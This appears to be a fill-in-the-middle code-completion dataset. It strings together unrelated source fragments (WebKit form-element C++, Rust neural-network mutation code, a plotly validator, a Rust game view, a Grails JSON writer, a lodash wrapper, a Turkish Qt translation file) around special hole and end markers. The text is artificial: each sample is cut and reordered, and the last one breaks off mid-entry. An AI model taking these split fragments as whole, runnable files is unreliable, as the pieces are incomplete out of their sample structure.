if (oldDocument && element->fastHasAttribute(formAttr))
resetFormAttributeTargetObserver();
}
void FormAssociatedElement::insertedInto(ContainerNode* insertionPoint)
{
resetFormOwner();
if (!insertionPoint->inDocument())
return;
HTMLElement* element = toHTMLElement(this);
if (element->fastHasAttribute(formAttr))
resetFormAttributeTargetObserver();
}
void FormAssociatedElement::removedFrom(ContainerNode* insertionPoint)
{
HTMLElement* element = toHTMLElement(this);
if (insertionPoint->inDocument() && element->fastHasAttribute(formAttr))
m_formAttributeTargetObserver = nullptr;
// If the form and element are both in the same tree, preserve the connection to the form.
// Otherwise, null out our form and remove ourselves from the form's list of elements.
if (m_form && element->highestAncestor() != m_form->highestAncestor())
setForm(0);
}
HTMLFormElement* FormAssociatedElement::findAssociatedForm(const HTMLElement* element, HTMLFormElement* currentAssociatedForm)
{
const AtomicString& formId(element->fastGetAttribute(formAttr));
if (!formId.isNull() && element->inDocument()) {
// The HTML5 spec says that the element should be associated with
// the first element in the document to have an ID that equal to
// the value of form attribute, so we put the result of
// treeScope()->getElementById() over the given element.
HTMLFormElement* newForm = 0;
Element* newFormCandidate = element->treeScope()->getElementById(formId);
if (newFormCandidate && newFormCandidate->hasTagName(formTag))
newForm = static_cast<HTMLFormElement*>(newFormCandidate);
return newForm;
}
if (!currentAssociatedForm)
return element->findFormAncestor();
return currentAssociatedForm;
}
void FormAssociatedElement::formRemovedFromTree(const Node* formRoot)
{
ASSERT(m_form);
if (toHTMLElement(this)->highestAncestor() != formRoot)
setForm(0);
}
void FormAssociatedElement::setForm(HTMLFormElement* newForm)
{
if (m_form == newForm)
return;
willChangeForm();
if (m_form)
m_form->removeFormElement(this);
m_form = newForm;
if (m_form)
m_form->registerFormElement(this);
didChangeForm();
}
void FormAssociatedElement::willChangeForm()
{
}
void FormAssociatedElement::didChangeForm()
{
}
void FormAssociatedElement::formWillBeDestroyed()
{
ASSERT(m_form);
if (!m_form)
return;
willChangeForm();
m_form = 0;
didChangeForm();
}
void FormAssociatedElement::resetFormOwner()
{
HTMLFormElement* originalForm = m_form;
setForm(findAssociatedForm(toHTMLElement(this), m_form));
HTMLElement* element = toHTMLElement(this);
if (m_form && m_form != originalForm && m_form->inDocument())
element->document()->didAssociateFormControl(element);
}
void FormAssociatedElement::formAttributeChanged()
{
HTMLElement* element = toHTMLElement(this);
if (!element->fastHasAttribute(formAttr)) {
// The form attribute removed. We need to reset form owner here.
HTMLFormElement* originalForm = m_form;
setForm(element->findFormAncestor());
HTMLElement* element = toHTMLElement(this);
if (m_form && m_form != originalForm && m_form->inDocument())
element->document()->didAssociateFormControl(element);
m_formAttributeTargetObserver = nullptr;
} else {
resetFormOwner();
if (element->inDocument())
resetFormAttributeTargetObserver();
}
}
bool FormAssociatedElement::customError() const
{
const HTMLElement* element = toHTMLElement(this);
return element->willValidate() && !m_customValidationMessage.isEmpty();
}
bool FormAssociatedElement::hasBadInput() const
{
return false;
}
bool FormAssociatedElement::patternMismatch() const
{
return false;
}
bool FormAssociatedElement::rangeOverflow() const
{
return false;
}
bool FormAssociatedElement::rangeUnderflow() const
{
return false;
}
bool FormAssociatedElement::stepMismatch() const
{
return false;
}
bool FormAssociatedElement::tooLong() const
{
return false;
}
bool FormAssociatedElement::typeMismatch() const
{
return false;
}
bool FormAssociatedElement::valid() const
{
bool someError = typeMismatch() || stepMismatch() || rangeUnderflow() || rangeOverflow()
|| tooLong() || patternMismatch() || valueMissing() || hasBadInput() || customError();
return !someError;
}
bool FormAssociatedElement::valueMissing() const
{
return false;
}
String FormAssociatedElement::customValidationMessage() const
{
return m_customValidationMessage;
}
String FormAssociatedElement::validationMessage() const
{
return customError() ? m_customValidationMessage : String();
}
void FormAssociatedElement::setCustomValidity(const String& error)
{
m_customValidationMessage = error;
}
void FormAssociatedElement::resetFormAttributeTargetObserver()
{
m_formAttributeTargetObserver = FormAttributeTargetObserver::create(toHTMLElement(this)->fastGetAttribute(formAttr), this);
}
void FormAssociatedElement::formAttributeTargetChanged()
{
resetFormOwner();
}
const AtomicString& FormAssociatedElement::name() const
{
const AtomicString& name = toHTMLElement(this)->getNameAttribute();
return name.isNull() ? emptyAtom : name;
}
bool FormAssociatedElement::isFormControlElementWithState() const
{
return false;
}
const HTMLElement* toHTMLElement(const FormAssociatedElement* associatedElement)
{
if (associatedElement->isFormControlElement())
return static_cast<const HTMLFormControlElement*>(associatedElement);
// Assumes the element is an HTMLObjectElement
const HTMLElement* element = static_cast<const HTMLObjectElement*>(associatedElement);
ASSERT(element->hasTagName(objectTag));
return element;
}
HTMLElement* toHTMLElement(FormAssociatedElement* associatedElement)
{
return const_cast<HTMLElement*>(toHTMLElement(static_cast<const FormAssociatedElement*>(associatedElement)));
}
PassOwnPtr<FormAttributeTargetObserver> FormAttributeTargetObserver::create(const AtomicString& id, FormAssociatedElement* element)
{
return adoptPtr(new FormAttributeTargetObserver(id, element));
}
FormAttributeTargetObserver::FormAttributeTargetObserver(const AtomicString& id, FormAssociatedElement* element)
: IdTargetObserver(toHTMLElement(element)->treeScope()->idTargetObserverRegistry(), id)
, m_element(element)
{
}
void FormAttributeTargetObserver::idTargetChanged()
{
m_element->formAttributeTargetChanged();
}
} // namespace Webcore<|fim▁end|>
|
#include "config.h"
#include "FormAssociatedElement.h"
|
<|file_name|>cge_utils.rs<|end_file_name|><|fim▁begin|>use rand::{thread_rng, Rng};
use cge::Network;
use cge::gene::{GeneExtras, Gene};
pub trait Mutation {
fn add_subnetwork(&mut self, input: usize, output: usize, inputs: usize);
fn add_forward(&mut self, input: usize, output: usize);
fn add_recurrent(&mut self, input: usize, output: usize);
fn add_bias(&mut self, output: usize);<|fim▁hole|> fn add_input(&mut self, input: usize, output: usize);
fn remove_connection(&mut self, index: usize, output: usize);
fn previous_neuron_index(&self, index: usize) -> Option<usize>;
}
impl Mutation for Network {
// inputs is the number of inputs to the network
// id is the id of the new neuron
// output is the index to put the neuron at
fn add_subnetwork(&mut self, id: usize, output: usize, inputs: usize) {
let mut rng = thread_rng();
let mut input_count = 0;
for i in 0..inputs {
if rng.gen() {
self.genome.insert(output, Gene::input(1.0, i));
input_count += 1;
}
}
if input_count == 0 {
self.genome.insert(output, Gene::input(1.0, rng.gen_range(0, inputs)));
input_count = 1;
}
self.genome.insert(output, Gene::neuron(1.0, id, input_count));
let prev_index = self.previous_neuron_index(output);
if let Some(i) = prev_index {
let (_, _, _, inputs) = self.genome[i].ref_mut_neuron().unwrap();
*inputs += 1;
}
self.size = self.genome.len() - 1;
}
// input is the id of the neuron to take input from
// output is the index to put the jumper at
fn add_forward(&mut self, input: usize, output: usize) {
self.genome.insert(output, Gene::forward(1.0, input));
self.size = self.genome.len() - 1;
let prev_index = self.previous_neuron_index(output).unwrap();
let (_, _, _, inputs) = self.genome[prev_index].ref_mut_neuron().unwrap();
*inputs += 1;
}
// input is the id of the neuron to take input from
// output is the index to put the jumper at
fn add_recurrent(&mut self, input: usize, output: usize) {
self.genome.insert(output, Gene::recurrent(1.0, input));
self.size = self.genome.len() - 1;
let prev_index = self.previous_neuron_index(output).unwrap();
let (_, _, _, inputs) = self.genome[prev_index].ref_mut_neuron().unwrap();
*inputs += 1;
}
// input is the id of the input to add a connection from
// output is the index to put the input connection at
fn add_input(&mut self, input: usize, output: usize) {
self.genome.insert(output, Gene::input(1.0, input));
self.size = self.genome.len() - 1;
let prev_index = self.previous_neuron_index(output).unwrap();
let (_, _, _, inputs) = self.genome[prev_index].ref_mut_neuron().unwrap();
*inputs += 1;
}
// output is the index to put the bias at
fn add_bias(&mut self, output: usize) {
self.genome.insert(output, Gene::bias(1.0));
self.size = self.genome.len() - 1;
let prev_index = self.previous_neuron_index(output).unwrap();
let (_, _, _, inputs) = self.genome[prev_index].ref_mut_neuron().unwrap();
*inputs += 1;
}
// output is the id of the neuron to remove the connection from
// index is the index of the gene to remove
fn remove_connection(&mut self, index: usize, output: usize) {
self.genome.remove(index);
self.size = self.genome.len() - 1;
let neuron_index = match self.get_neuron_index(output) {
Some(v) => v,
None => {
println!("{}", output);
println!("{:?}", self);
panic!();
}
};
let (_, _, _, inputs) = self.genome[neuron_index].ref_mut_neuron().expect("bar");
*inputs -= 1;
}
// get index of the first neuron before the index
// to prevent code duplication
fn previous_neuron_index(&self, index: usize) -> Option<usize> {
for i in (0..index).rev() {
if let GeneExtras::Neuron(_, _) = self.genome[i].variant {
return Some(i);
}
}
None
}
}<|fim▁end|>
| |
<|file_name|>_size.py<|end_file_name|><|fim▁begin|>import _plotly_utils.basevalidators
<|fim▁hole|> self,
plotly_name="size",
parent_name="histogram.marker.colorbar.tickfont",
**kwargs
):
super(SizeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
min=kwargs.pop("min", 1),
role=kwargs.pop("role", "style"),
**kwargs
)<|fim▁end|>
|
class SizeValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
|
<|file_name|>explicit_self_xcrate_exe.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// xfail-fast
// aux-build:explicit_self_xcrate.rs
extern mod explicit_self_xcrate;
use explicit_self_xcrate::{Foo, Bar};<|fim▁hole|> x.f();
}<|fim▁end|>
|
pub fn main() {
let x = Bar { x: ~"hello" };
|
<|file_name|>view.rs<|end_file_name|><|fim▁begin|>// +--------------------------------------------------------------------------+
// | Copyright 2016 Matthew D. Steele <[email protected]> |
// | |
// | This file is part of System Syzygy. |
// | |
// | System Syzygy is free software: you can redistribute it and/or modify it |
// | under the terms of the GNU General Public License as published by the |
// | Free Software Foundation, either version 3 of the License, or (at your |
// | option) any later version. |
// | |
// | System Syzygy is distributed in the hope that it will be useful, but |
// | WITHOUT ANY WARRANTY; without even the implied warranty of |
// | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU |
// | General Public License for details. |
// | |
// | You should have received a copy of the GNU General Public License along |
// | with System Syzygy. If not, see <http://www.gnu.org/licenses/>. |
// +--------------------------------------------------------------------------+
use std::rc::Rc;
use super::scenes;
use crate::elements::{FadeStyle, PuzzleCmd, PuzzleCore, PuzzleView};
use crate::gui::{<|fim▁hole|>};
use crate::modes::SOLVED_INFO_TEXT;
use crate::save::{Game, LineState, PuzzleState};
// ========================================================================= //
pub struct View {
core: PuzzleCore<()>,
grid1: LetterGrid,
grid2: LetterGrid,
answers: AnswersDisplay,
delay: i32,
}
impl View {
pub fn new(
resources: &mut Resources,
visible: Rect,
state: &LineState,
) -> View {
let mut core = {
let fade = (FadeStyle::LeftToRight, FadeStyle::LeftToRight);
let intro = scenes::compile_intro_scene(resources);
let outro = scenes::compile_outro_scene(resources);
PuzzleCore::new(resources, visible, state, fade, intro, outro)
};
core.add_extra_scene(scenes::compile_ugrent_midscene(resources));
View {
core,
grid1: LetterGrid::new(resources, 80, 48, false),
grid2: LetterGrid::new(resources, 320, 48, true),
answers: AnswersDisplay::new(resources, 168, 272),
delay: 0,
}
}
}
impl Element<Game, PuzzleCmd> for View {
fn draw(&self, game: &Game, canvas: &mut Canvas) {
let state = &game.cross_the_line;
self.core.draw_back_layer(canvas);
self.grid1.draw(state, canvas);
self.grid2.draw(state, canvas);
self.answers.draw(state, canvas);
self.core.draw_middle_layer(canvas);
self.core.draw_front_layer(canvas, state);
}
fn handle_event(
&mut self,
event: &Event,
game: &mut Game,
) -> Action<PuzzleCmd> {
let state = &mut game.cross_the_line;
let mut action = self.core.handle_event(event, state);
if !action.should_stop() && event == &Event::ClockTick {
if self.delay > 0 {
self.delay -= 1;
if self.delay == 0 {
self.grid1.reset();
self.grid2.reset();
if state.is_solved() {
self.core.begin_outro_scene();
action = action.and_return(PuzzleCmd::Save);
}
action.also_redraw();
}
}
}
if !action.should_stop() && self.delay == 0 {
let mut subaction = self.grid1.handle_event(event, state);
if !subaction.should_stop() {
subaction.merge(self.grid2.handle_event(event, state));
}
if let Some(&()) = subaction.value() {
if let Some(index1) = self.grid1.selected {
if let Some(index2) = self.grid2.selected {
self.grid1.override_grid =
Some((state.num_cols(), state.grid1().to_vec()));
self.grid2.override_grid =
Some((state.num_cols(), state.grid2().to_vec()));
self.delay = 20;
if state.pick_chars(index1, index2) {
action.also_play_sound(Sound::mid_puzzle_chime());
} else {
self.grid1.error = true;
self.grid2.error = true;
action.also_play_sound(Sound::talk_annoyed_hi());
}
}
}
}
action.merge(subaction.but_no_value());
}
if !action.should_stop() && self.delay == 0 {
let subaction = self.answers.handle_event(event, state);
action.merge(subaction.but_no_value());
}
if !action.should_stop() && self.delay == 0 {
self.core.begin_character_scene_on_click(event);
}
action
}
}
impl PuzzleView for View {
fn info_text(&self, game: &Game) -> &'static str {
if game.cross_the_line.is_solved() {
SOLVED_INFO_TEXT
} else {
INFO_BOX_TEXT
}
}
fn undo(&mut self, _: &mut Game) {}
fn redo(&mut self, _: &mut Game) {}
fn reset(&mut self, game: &mut Game) {
self.core.clear_undo_redo();
game.cross_the_line.reset();
}
fn solve(&mut self, game: &mut Game) {
game.cross_the_line.solve();
self.core.begin_outro_scene();
}
fn drain_queue(&mut self) {
for entry in self.core.drain_queue() {
match entry {
(0, -1) => {
self.grid1.override_grid = Some((1, Vec::new()));
self.grid2.override_grid = Some((1, Vec::new()));
}
(0, 0) => {
self.grid1.override_grid = None;
self.grid2.override_grid = None;
}
(0, 1) => {
self.grid1.override_grid =
Some((4, "SAFE".chars().collect()));
self.grid2.override_grid =
Some((4, "FACE".chars().collect()));
}
(1, index) => {
if index >= 0 {
self.grid1.selected = Some(index as usize);
} else {
self.grid1.selected = None;
}
}
(2, index) => {
if index >= 0 {
self.grid2.selected = Some(index as usize);
} else {
self.grid2.selected = None;
}
}
(3, hide) => {
self.answers.filtered = hide != 0;
}
_ => {}
}
}
}
}
// ========================================================================= //
const BOX_USIZE: u32 = 24;
const BOX_SIZE: i32 = BOX_USIZE as i32;
const MAX_GRID_WIDTH: u32 = 176;
const MAX_GRID_HEIGHT: u32 = 144;
struct LetterGrid {
left: i32,
top: i32,
is_grid_2: bool,
font: Rc<Font>,
selected: Option<usize>,
override_grid: Option<(i32, Vec<char>)>,
error: bool,
}
impl LetterGrid {
fn new(
resources: &mut Resources,
left: i32,
top: i32,
is_grid_2: bool,
) -> LetterGrid {
LetterGrid {
left,
top,
is_grid_2,
font: resources.get_font("block"),
selected: None,
override_grid: None,
error: false,
}
}
fn reset(&mut self) {
self.selected = None;
self.override_grid = None;
self.error = false;
}
fn max_rect(&self) -> Rect {
Rect::new(self.left, self.top, MAX_GRID_WIDTH, MAX_GRID_HEIGHT)
}
fn grid_rect(&self, num_cols: i32, num_chars: usize) -> Rect {
let num_rows = (num_chars as i32 + num_cols - 1) / num_cols;
let width = num_cols * BOX_SIZE;
let height = num_rows * BOX_SIZE;
let left = self.left + (MAX_GRID_WIDTH as i32 - width) / 2;
let top = self.top + (MAX_GRID_HEIGHT as i32 - height) / 2;
Rect::new(left, top, width as u32, height as u32)
}
}
impl Element<LineState, ()> for LetterGrid {
fn draw(&self, state: &LineState, canvas: &mut Canvas) {
let (num_cols, grid) =
if let Some((num_cols, ref grid)) = self.override_grid {
(num_cols, grid.as_slice())
} else if self.is_grid_2 {
(state.num_cols(), state.grid2())
} else {
(state.num_cols(), state.grid1())
};
let grid_rect = self.grid_rect(num_cols, grid.len());
let mut col = 0;
let mut row = 0;
for (index, &chr) in grid.iter().enumerate() {
let box_left = grid_rect.left() + col * BOX_SIZE;
let box_top = grid_rect.top() + row * BOX_SIZE;
if self.selected == Some(index) {
let rect = Rect::new(box_left, box_top, BOX_USIZE, BOX_USIZE);
let color =
if self.error { (128, 64, 64) } else { (255, 255, 128) };
canvas.fill_rect(color, rect);
}
let pt =
Point::new(box_left + BOX_SIZE / 2, box_top + BOX_SIZE - 3);
canvas.draw_char(&self.font, Align::Center, pt, chr);
col += 1;
if col >= num_cols {
col = 0;
row += 1;
}
}
}
fn handle_event(
&mut self,
event: &Event,
state: &mut LineState,
) -> Action<()> {
match event {
&Event::MouseDown(pt) => {
let num_cols = state.num_cols();
let num_chars = if self.is_grid_2 {
state.grid2().len()
} else {
state.grid1().len()
};
let rect = self.grid_rect(num_cols, num_chars);
let mut new_selected = self.selected;
if rect.contains_point(pt) {
let col = (pt.x() - rect.left()) / BOX_SIZE;
let row = (pt.y() - rect.top()) / BOX_SIZE;
let index = (row * num_cols + col) as usize;
if index >= num_chars || self.selected == Some(index) {
new_selected = None;
} else {
new_selected = Some(index);
}
} else if self.max_rect().contains_point(pt) {
new_selected = None;
}
if new_selected != self.selected {
self.selected = new_selected;
return Action::redraw().and_return(());
}
}
_ => {}
}
Action::ignore()
}
}
// ========================================================================= //
const FILTER: &[(bool, bool)] = &[
(true, false),
(false, false),
(true, false),
(false, true),
(true, true),
(false, false),
(false, true),
(false, false),
(true, false),
(false, true),
];
struct AnswersDisplay {
left: i32,
top: i32,
font: Rc<Font>,
filtered: bool,
}
impl AnswersDisplay {
fn new(resources: &mut Resources, left: i32, top: i32) -> AnswersDisplay {
AnswersDisplay {
left,
top,
font: resources.get_font("block"),
filtered: false,
}
}
}
impl Element<LineState, ()> for AnswersDisplay {
fn draw(&self, state: &LineState, canvas: &mut Canvas) {
for stage in 0..state.current_stage() {
let (chr1, chr2) = state.stage_letters(stage);
let cx = self.left + stage * BOX_SIZE + BOX_SIZE / 2;
if !self.filtered || FILTER[stage as usize].0 {
let pt1 = Point::new(cx, self.top + BOX_SIZE - 3);
canvas.draw_char(&self.font, Align::Center, pt1, chr1);
}
if !self.filtered || FILTER[stage as usize].1 {
let pt2 = Point::new(cx, self.top + 2 * BOX_SIZE - 3);
canvas.draw_char(&self.font, Align::Center, pt2, chr2);
}
}
}
fn handle_event(
&mut self,
event: &Event,
_state: &mut LineState,
) -> Action<()> {
match event {
_ => Action::ignore(),
}
}
}
// ========================================================================= //
const INFO_BOX_TEXT: &str = "\
Your goal is to find the discrepancy between the
two upper grids.
Each of the two upper grids contains a character
that does not appear in the other. $M{Tap}{Click} each of
those two characters to proceed. If you choose
incorrectly, the grids will rescramble and you
will have to try again.
$M{Tap}{Click} on a character in the scene to hear their
words of wisdom.";
// ========================================================================= //<|fim▁end|>
|
Action, Align, Canvas, Element, Event, Font, Point, Rect, Resources, Sound,
|
<|file_name|>PrettyPrintJSONWriter.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2004-2008 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.codehaus.groovy.grails.web.json;
import static org.codehaus.groovy.grails.web.json.JSONWriter.Mode.ARRAY;
import static org.codehaus.groovy.grails.web.json.JSONWriter.Mode.KEY;
import static org.codehaus.groovy.grails.web.json.JSONWriter.Mode.OBJECT;
import java.io.IOException;
import java.io.Writer;
/**
* A JSONWriter dedicated to create indented/pretty printed output.
*
* @author Siegfried Puchbauer
* @since 1.1
*/
public class PrettyPrintJSONWriter extends JSONWriter {
public static final String DEFAULT_INDENT_STR = " ";
public static final String NEWLINE;
static {
String nl = System.getProperty("line.separator");
NEWLINE = nl != null ? nl : "\n";<|fim▁hole|> }
private int indentLevel = 0;
private final String indentStr;
public PrettyPrintJSONWriter(Writer w) {
this(w, DEFAULT_INDENT_STR);
}
public PrettyPrintJSONWriter(Writer w, String indentStr) {
super(w);
this.indentStr = indentStr;
}
private void newline() {
try {
writer.write(NEWLINE);
}
catch (IOException e) {
throw new JSONException(e);
}
}
private void indent() {
try {
for (int i = 0; i < indentLevel; i++) {
writer.write(indentStr);
}
}
catch (IOException e) {
throw new JSONException(e);
}
}
@Override
protected JSONWriter append(String s) {
if (s == null) {
throw new JSONException("Null pointer");
}
if (mode == OBJECT || mode == ARRAY) {
try {
if (comma && mode == ARRAY) {
comma();
}
if (mode == ARRAY) {
newline();
indent();
}
writer.write(s);
}
catch (IOException e) {
throw new JSONException(e);
}
if (mode == OBJECT) {
mode = KEY;
}
comma = true;
return this;
}
throw new JSONException("Value out of sequence.");
}
@Override
protected JSONWriter end(Mode m, char c) {
newline();
indent();
return super.end(m, c);
}
@Override
public JSONWriter array() {
super.array();
indentLevel++;
return this;
}
@Override
public JSONWriter endArray() {
indentLevel--;
super.endArray();
return this;
}
@Override
public JSONWriter object() {
super.object();
indentLevel++;
return this;
}
@Override
public JSONWriter endObject() {
indentLevel--;
super.endObject();
return this;
}
@Override
public JSONWriter key(String s) {
if (s == null) {
throw new JSONException("Null key.");
}
if (mode == KEY) {
try {
if (comma) {
comma();
}
newline();
indent();
writer.write(JSONObject.quote(s));
writer.write(": ");
comma = false;
mode = OBJECT;
return this;
}
catch (IOException e) {
throw new JSONException(e);
}
}
throw new JSONException("Misplaced key.");
}
}<|fim▁end|>
| |
<|file_name|>wrapperLodash.js<|end_file_name|><|fim▁begin|>var convert = require('./convert'),
func = convert('wrapperLodash', require('../wrapperLodash'), require('./_falseOptions'));
<|fim▁hole|><|fim▁end|>
|
func.placeholder = require('./placeholder');
module.exports = func;
|
<|file_name|>Drawing_tr.ts<|end_file_name|><|fim▁begin|><?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE TS>
<TS version="2.1" language="tr" sourcelanguage="en">
<context>
<name>CmdDrawingAnnotation</name>
<message>
<location filename="../../Command.cpp" line="481"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="482"/>
<source>&Annotation</source>
<translation>&Açıklayıcı notlar</translation>
</message>
<message>
<location filename="../../Command.cpp" line="483"/>
<location filename="../../Command.cpp" line="485"/>
<source>Inserts an Annotation view in the active drawing</source>
<translation>Etkin çizime açıklayıcı bir not ekler</translation>
</message>
</context>
<context>
<name>CmdDrawingClip</name>
<message>
<location filename="../../Command.cpp" line="529"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="530"/>
<source>&Clip</source>
<translation>&Kırpmak</translation>
</message>
<message>
<location filename="../../Command.cpp" line="531"/>
<location filename="../../Command.cpp" line="533"/>
<source>Inserts a clip group in the active drawing</source>
<translation>Etkin çizimine kırpma grubu ekler</translation>
</message>
</context>
<context>
<name>CmdDrawingDraftView</name>
<message>
<location filename="../../Command.cpp" line="728"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="729"/>
<source>&Draft View</source>
<translation>&Taslak Görünümü</translation>
</message>
<message>
<location filename="../../Command.cpp" line="730"/>
<location filename="../../Command.cpp" line="732"/>
<source>Inserts a Draft view of the selected object(s) in the active drawing</source>
<translation>Seçili nesnelerin taslak görünümünü etkin çizime ekler</translation>
</message>
</context>
<context>
<name>CmdDrawingExportPage</name>
<message>
<location filename="../../Command.cpp" line="635"/>
<source>File</source>
<translation>Dosya</translation>
</message>
<message>
<location filename="../../Command.cpp" line="636"/>
<source>&Export page...</source>
<translation>&Sayfayı dışa aktar...</translation>
</message>
<message>
<location filename="../../Command.cpp" line="637"/>
<location filename="../../Command.cpp" line="639"/>
<source>Export a page to an SVG file</source>
<translation>Sayfayı, SVG dosyası olarak dışarı aktar</translation>
</message>
</context>
<context>
<name>CmdDrawingNewA3Landscape</name>
<message>
<location filename="../../Command.cpp" line="275"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="276"/>
<location filename="../../Command.cpp" line="277"/>
<source>Insert new A3 landscape drawing</source>
<translation>Yeni yatay A3 boyutlu çizim ekle</translation>
</message>
</context>
<context>
<name>CmdDrawingNewPage</name>
<message>
<location filename="../../Command.cpp" line="97"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="98"/>
<location filename="../../Command.cpp" line="99"/>
<source>Insert new drawing</source>
<translation>Yeni Çizim Ekle</translation>
</message>
</context>
<context>
<name>CmdDrawingNewView</name>
<message>
<location filename="../../Command.cpp" line="314"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="315"/>
<source>Insert view in drawing</source>
<translation>Çizime görünüm ekle</translation>
</message>
<message>
<location filename="../../Command.cpp" line="316"/>
<source>Insert a new View of a Part in the active drawing</source><|fim▁hole|> </message>
</context>
<context>
<name>CmdDrawingOpen</name>
<message>
<location filename="../../Command.cpp" line="60"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="61"/>
<source>Open SVG...</source>
<translation>SVG Aç...</translation>
</message>
<message>
<location filename="../../Command.cpp" line="62"/>
<source>Open a scalable vector graphic</source>
<translation>Boyutlandırılabilir bir vektörel çizim seçin</translation>
</message>
</context>
<context>
<name>CmdDrawingOpenBrowserView</name>
<message>
<location filename="../../Command.cpp" line="443"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="444"/>
<source>Open &browser view</source>
<translation>&tarayıcı görünümü aç</translation>
</message>
<message>
<location filename="../../Command.cpp" line="445"/>
<location filename="../../Command.cpp" line="447"/>
<source>Opens the selected page in a browser view</source>
<translation>Seçili sayfayı tarayıcı görünümünde açar</translation>
</message>
</context>
<context>
<name>CmdDrawingOrthoViews</name>
<message>
<location filename="../../Command.cpp" line="393"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="394"/>
<source>Insert orthographic views</source>
<translation>Ortografik görünümleri ekle</translation>
</message>
<message>
<location filename="../../Command.cpp" line="395"/>
<source>Insert an orthographic projection of a part in the active drawing</source>
<translation>Bir parçanın ortografik izdüşümünü etkin çizime ekle</translation>
</message>
</context>
<context>
<name>CmdDrawingProjectShape</name>
<message>
<location filename="../../Command.cpp" line="692"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="693"/>
<source>Project shape...</source>
<translation>Proje şekilleri...</translation>
</message>
<message>
<location filename="../../Command.cpp" line="694"/>
<location filename="../../Command.cpp" line="695"/>
<source>Project shape onto a user-defined plane</source>
<translation>Kullanıcının tanımladığı bir düzleme şekli yansıt</translation>
</message>
</context>
<context>
<name>CmdDrawingSpreadsheetView</name>
<message>
<location filename="../../Command.cpp" line="759"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="760"/>
<source>&Spreadsheet View</source>
<translation>He&sapTablosu Görünümü</translation>
</message>
<message>
<location filename="../../Command.cpp" line="761"/>
<location filename="../../Command.cpp" line="763"/>
<source>Inserts a view of a selected spreadsheet in the active drawing</source>
<translation>Seçili hesap tablolarının bir görünümünü etkin çizime ekler</translation>
</message>
</context>
<context>
<name>CmdDrawingSymbol</name>
<message>
<location filename="../../Command.cpp" line="574"/>
<source>Drawing</source>
<translation>Çizim</translation>
</message>
<message>
<location filename="../../Command.cpp" line="575"/>
<source>&Symbol</source>
<translation>&Sembol</translation>
</message>
<message>
<location filename="../../Command.cpp" line="576"/>
<location filename="../../Command.cpp" line="578"/>
<source>Inserts a symbol from a svg file in the active drawing</source>
<translation>Etkin çizimde bir svg dosyasından bir simge ekler</translation>
</message>
</context>
<context>
<name>DrawingGui::DrawingView</name>
<message>
<location filename="../../DrawingView.cpp" line="219"/>
<source>&Background</source>
<translation>&Arkaplan</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="225"/>
<source>&Outline</source>
<translation>&Taslak</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="231"/>
<source>&Native</source>
<translation>&Yerel</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="235"/>
<source>&OpenGL</source>
<translation>&OpenGL</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="238"/>
<source>&Image</source>
<translation>&Resim</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="242"/>
<source>&High Quality Antialiasing</source>
<translation>&Yüksek kaliteli keskinlik yumuşatma</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="284"/>
<source>Open SVG File</source>
<translation>SVG Dosyası Aç</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="285"/>
<source>Could not open file '%1'.</source>
<translation>'%1' adlı dosya açılamadı.</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="408"/>
<source>&Renderer</source>
<translation>İşleyici (Renderer)</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="513"/>
<source>Export PDF</source>
<translation>PDF olarak dışarı aktar</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="514"/>
<source>PDF file</source>
<translation>PDF dosyası</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="530"/>
<source>Page sizes</source>
<translation>Sayfa boyutları</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="532"/>
<location filename="../../DrawingView.cpp" line="545"/>
<source>A0</source>
<translation>A0</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="534"/>
<location filename="../../DrawingView.cpp" line="547"/>
<source>A1</source>
<translation>A1</translation>
</message>
<message>
<location filename="../../DrawingView.cpp" line="536"/>
<location filename="../../DrawingView.cpp" line="549"/>
<source>A2</source>
<translation>A2</translation>
</message>
<message>
